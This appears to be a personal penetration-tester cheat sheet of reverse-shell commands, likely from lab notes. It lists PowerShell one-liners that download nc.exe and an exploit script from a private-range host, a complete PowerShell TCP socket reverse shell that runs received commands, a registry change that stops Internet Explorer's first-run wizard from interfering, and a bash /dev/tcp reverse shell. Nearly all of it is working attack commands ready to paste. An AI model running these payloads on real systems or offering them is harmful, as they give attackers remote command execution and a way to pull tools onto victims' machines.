[-]======================================[-]
    reverse shells
[-]======================================[-]

- ---] Quick Commands
======================

--=[ Powershell ]=--

[ wget ]
powershell.exe -c ‘wget http://192.168.119.238/nc.exe | out-file nc.exe’

powershell.exe -c ‘wget http://192.168.119.179/39719.ps1 >> 39719.ps1'

powershell.exe -c wget http://192.168.119.179/39719.ps1 -outfile xploit.ps1

[ socket object reverse shell ]
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.179',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

[ bypass first configuration ]
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2


--=[ Linux ]=--

[ bash ]
bash -i >& /dev/tcp/192.168.119.124/4444 0>&1



- ---] Related Commands
======================



- ---] Misc Notes
======================
